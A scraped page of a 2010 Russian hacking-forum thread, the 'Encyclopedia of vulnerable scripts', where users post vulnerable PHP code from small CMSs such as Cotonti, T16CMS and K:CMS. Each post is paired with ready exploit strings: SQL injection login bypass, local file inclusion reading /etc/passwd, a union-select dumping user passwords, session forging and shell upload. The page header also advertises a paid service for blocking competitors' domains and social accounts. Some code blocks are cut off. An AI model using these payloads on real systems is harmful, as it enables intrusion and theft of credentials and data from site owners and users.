УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Энциклопедия уязвимых скриптов

Страница 42 из 52

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#411

01.07.2010, 12:44

BlackFan

Новичок

Регистрация: 03.01.2009

Сообщений: 27

Провел на форуме:
367442

Репутация: 41

Cotonti (0.6 - 0.6.8)

http://www.cotonti.com/downloads/releases/

File Disclosure

magic_quotes = Off

File: rc.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$src_uri[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'uri'[/COLOR][COLOR="#007700"]];

if (![/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$src_uri[/COLOR][COLOR="#007700"])) {

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'HTTP/1.1 404 Not Found'[/COLOR][COLOR="#007700"]);

    echo([/COLOR][COLOR="#DD0000"]'HTTP 404 - Not Found'[/COLOR][COLOR="#007700"]);

    exit; 

}

...

if (!isset([/COLOR][COLOR="#0000BB"]$known_content_types[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$file_extension[/COLOR][COLOR="#007700"]])) {

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'HTTP/1.1 403 Forbidden'[/COLOR][COLOR="#007700"]);

    echo([/COLOR][COLOR="#DD0000"]'HTTP 403 - Forbidden'[/COLOR][COLOR="#007700"]);

    exit;

}

...

[/COLOR][COLOR="#0000BB"]$dst_uri[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$src_uri[/COLOR][COLOR="#007700"];

...

[/COLOR][COLOR="#0000BB"]readfile[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$dst_uri[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]

Код:

Code:
http://site/rc.php?uri=datas/config.php%00.js

Passive XSS

File: system/common.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if(empty([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sourcekey'[/COLOR][COLOR="#007700"]]))

                {

[/COLOR][COLOR="#0000BB"]$sys[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'xk'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]mb_strtoupper[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]sed_unique[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]));

[/COLOR][COLOR="#0000BB"]$update_sid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]", user_sid = '[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$sys[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'xk'[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]sed_setcookie[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'sourcekey'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$sys[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'xk'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]()+[/COLOR][COLOR="#0000BB"]$cfg[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cookielifetime'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$cfg[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cookiepath'[/COLOR][COLOR="#007700"]],

[/COLOR][COLOR="#0000BB"]$cfg[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cookiedomain'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$sys[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'secure'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]);

                }

                else

                {

[/COLOR][COLOR="#0000BB"]$sys[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'xk'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sourcekey'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$update_sid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

                }[/COLOR][/COLOR]

File: system/functions.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]sed_xp[/COLOR][COLOR="#007700"]()

{

    global[/COLOR][COLOR="#0000BB"]$sys[/COLOR][COLOR="#007700"];

    return[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

}[/COLOR][/COLOR]

Код:

Code:
COOKIE
sourcekey = ">123

#412

02.07.2010, 01:08

_iks_

Познающий

Регистрация: 21.02.2009

Сообщений: 54

Провел на форуме:
1224548

Репутация: 134

T16CMS v1.0

Download: http://code.google.com/p/t16cms/

SQL-иньекция{обход авторизации}(mq==off):

Уязвимый файл:

./t16cms/php/user.php

Код:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]get_reg[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$inp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]) {

global[/COLOR][COLOR="#0000BB"]$dbhost[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$dbname[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$dbuser[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$dbpasswd[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$dbprefix[/COLOR][COLOR="#007700"];

echo[/COLOR][COLOR="#0000BB"]$inp[/COLOR][COLOR="#007700"];

if ([/COLOR][COLOR="#0000BB"]$inp[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]){

if (@isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'authkey'[/COLOR][COLOR="#007700"]])){

[/COLOR][COLOR="#0000BB"]$_authkey[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'authkey'[/COLOR][COLOR="#007700"]];

if ([/COLOR][COLOR="#0000BB"]$_authkey[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]){

[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'SELECT * FROM `_users` WHERE `authkey` = '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_authkey[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' LIMIT 1'[/COLOR][COLOR="#007700"];

echo[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]mysql_connect[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$dbhost[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$dbuser[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$dbpasswd[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'SET NAMES cp1251'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_db_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$dbname[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]);

while([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"])) {

  if ([/COLOR][COLOR="#0000BB"]get_right[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'access'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'access'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])){

  global[/COLOR][COLOR="#0000BB"]$site_user[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$site_user[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];

  }else{echo[/COLOR][COLOR="#DD0000"]"Вы видимо не активированный"[/COLOR][COLOR="#007700"];}[/COLOR][COLOR="#FF8000"]//уголь

[/COLOR][COLOR="#007700"]};

[/COLOR][COLOR="#0000BB"]mysql_free_result[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]);

}}

}else {

...[/COLOR][/COLOR]

LFI(авторизация):

Уязвимый файл:

./t16cms/cp/index.php

Код:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'module'[/COLOR][COLOR="#007700"]])){

[/COLOR][COLOR="#0000BB"]$default[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'module'[/COLOR][COLOR="#007700"]];

...

[/COLOR][COLOR="#0000BB"]$default[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"modules/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$default[/COLOR][COLOR="#007700"];

...

if ([/COLOR][COLOR="#0000BB"]get_reg[/COLOR][COLOR="#007700"]()==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]) {[/COLOR][COLOR="#FF8000"]//авторизация, код выше

[/COLOR][COLOR="#007700"]...

include[/COLOR][COLOR="#0000BB"]$default[/COLOR][COLOR="#007700"];

[/COLOR][/COLOR]

Эксплуатация(обе):

./t16cms/cp/index.php?authkey=1'+or+1=1--+&module=../../../../etc/passwd

InvisCMS v0.15

Download: http://code.google.com/p/inviscms/

LFI(mq==off):

Уязвимый файл:

./dx.php

Код:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

switch ([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'x'[/COLOR][COLOR="#007700"]):

...

case[/COLOR][COLOR="#DD0000"]'0x21'[/COLOR][COLOR="#007700"]:

[/COLOR][COLOR="#0000BB"]$d[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#FF8000"]#die_r($_GET);

[/COLOR][COLOR="#007700"]if(isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'frm_name'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'frm_name'[/COLOR][COLOR="#007700"]]!=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]&& isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'result'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'result'[/COLOR][COLOR="#007700"]]!=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"])

            {

[/COLOR][COLOR="#0000BB"]$brain[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'path_to_site'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]'/lib/core/others/forms/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'frm_name'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]'.inc'[/COLOR][COLOR="#007700"];

                

                if([/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$brain[/COLOR][COLOR="#007700"]))

                {

                    @include([/COLOR][COLOR="#0000BB"]$brain[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#FF8000"]#die(stripslashes($_GET['result']));

[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$jsondecoder[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]decode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]stripslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'result'[/COLOR][COLOR="#007700"]]));

[/COLOR][COLOR="#0000BB"]$d[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]call_user_func[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'frm_name'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]'_main'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]]);

                }else{

[/COLOR][COLOR="#0000BB"]$d[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];

                }

            }

            print[/COLOR][COLOR="#0000BB"]$jsonencoder[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]encode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$d[/COLOR][COLOR="#007700"]);

            break;

[/COLOR][/COLOR]

Эксплуатация:

./dx.php?x=33&frm_name=../../../../../../apache/log%00&result=33серебреника

#413

02.07.2010, 15:37

_iks_

Познающий

Регистрация: 21.02.2009

Сообщений: 54

Провел на форуме:
1224548

Репутация: 134

varioCMS v0.5.6.1

Download: http://sourceforge.net/projects/variocms/

LFI(mq==on):

Уязвимый файл:

./plugins/audience/contact/contact.php

Код:

[PHP]
PHP:
[COLOR="#000000"][COLOR="#007700"]*аргумент функции setlocale() не должен начинаться с точки, слеша и.т.д

UPD:

xCms V1.14

Download: http://code.google.com/p/spacedaily/downloads/detail?name=xCmsVer1.14.rar&can=2&q=

LFI(mq==off):

Уязвимый файл:

./tobbs.php

Код:

[PHP]
PHP:
[COLOR="#000000"][COLOR="#007700"]

#414

05.07.2010, 15:52

.:[melkiy]:.

Постоянный

Регистрация: 25.01.2009

Сообщений: 368

Провел на форуме:
5290740

Репутация: 912

Product: ViCMS

Version: 0.0.1

Download: www.sourceforge.net/projects/cmscolvi/

Authorization bypass

Need: шелл на соседнем сайте; доступ на запись в /tmp

file: admin.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]session_start[/COLOR][COLOR="#007700"]();

if(!isset([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'logged_in'[/COLOR][COLOR="#007700"]])){

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Location: ./login.php'[/COLOR][COLOR="#007700"]);

    exit;

}

if([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'logged_in'[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#DD0000"]'bormental'[/COLOR][COLOR="#007700"]){

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Location: ./login.php'[/COLOR][COLOR="#007700"]);

    exit;

} 

[/COLOR][/COLOR]

result:

1. Создаём сессию

Имя: sess_8bf6d5e1d9eec3a8436704f883068ebf

Содержание: logged_in|s:9:"bormental";

2. Сохраняем в /tmp

3. В куки пишем: PHPSESSID=8bf6d5e1d9eec3a8436704f883068ebf

4. Заходим http://[host]/admin.php

#415

05.07.2010, 17:58

.:[melkiy]:.

Постоянный

Регистрация: 25.01.2009

Сообщений: 368

Провел на форуме:
5290740

Репутация: 912

Product: K:CMS

Version: 2.1.1

Download: www.kcms.cz

LFI

Need: mq=off

file: install.php (!!!)

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"lang"[/COLOR][COLOR="#007700"]])) {

include[/COLOR][COLOR="#DD0000"]"languages/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"lang"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]".php"[/COLOR][COLOR="#007700"];

}

[/COLOR][/COLOR]

result:

Код:

Code:
/install.php?lang=../../../[local_file]%00

LFI

Need: mq=off, admin account

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"function"[/COLOR][COLOR="#007700"]])) {

include[/COLOR][COLOR="#DD0000"]"components/pages_admin/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"function"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]".php"[/COLOR][COLOR="#007700"];

[/COLOR][/COLOR]

result:

Код:

Code:
/admin.php?function=../../../[local_file]%00

SQL-Injection

Need: mq=off

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$item[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT id, login, rights, mail, regdate, lastvisit, realname, age, jabber, skype, msn, about, sign, icq, avatar FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]TABLE_USERS[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" WHERE login='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]htmlspecialchars[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"profile"[/COLOR][COLOR="#007700"]]).[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$item[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$item[/COLOR][COLOR="#007700"]);

[/COLOR][/COLOR]

result:

Код:

Code:
/index.php?profile=-qwerty'+union+select+1,concat_ws(0x3a,id,login,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+kcms_users+--+

Upload ShellCode

Need: admin account

Заходим admin.php?function=files . Выбираем шелл, загружаем. Шелл будет доступен по адресу files/shell.php .

Никаких проверок на расширение

#416

12.07.2010, 16:34

SeNaP

Участник форума

Регистрация: 07.08.2008

Сообщений: 281

Провел на форуме:
3300342

Репутация: 165

AMXBANS 6.0.0

======Вход под администратором:

/include/access.inc.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if(isset([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]cookie[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"loggedin"[/COLOR][COLOR="#007700"]]==[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$cook[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]":"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]cookie[/COLOR][COLOR="#007700"]]);

    

[/COLOR][COLOR="#0000BB"]$sid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$cook[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];

        if(![/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"lang"[/COLOR][COLOR="#007700"]])[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"lang"[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$cook[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];

    

[/COLOR][COLOR="#0000BB"]$mysql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_connect[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_host[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_user[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_pass[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

[/COLOR][COLOR="#0000BB"]$resource[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_select_db[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_db[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT id,username,level,email FROM `"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_webadmins` WHERE logcode='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$sid[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"' LIMIT 1"[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

        if([/COLOR][COLOR="#0000BB"]mysql_num_rows[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"])) {

            while([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_object[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"])) {

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"uid"[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"uname"[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]username[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"email"[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]email[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"level"[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]level[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"sid"[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]session_id[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"loggedin"[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];

            }

[/COLOR][/COLOR]

Экспл:

Код:

Code:
В куки добавляем: ' or id=1 -- :123

=====Любой юзер может сделать unban

/ban_list.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if(isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"del_ban_x"[/COLOR][COLOR="#007700"]]) && isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"bid"[/COLOR][COLOR="#007700"]])) {

[/COLOR][COLOR="#FF8000"]//get all uploaded files for the ban and delete it

[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT `id`,`demo_file` FROM `"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_files` WHERE `bid`="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$bid[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

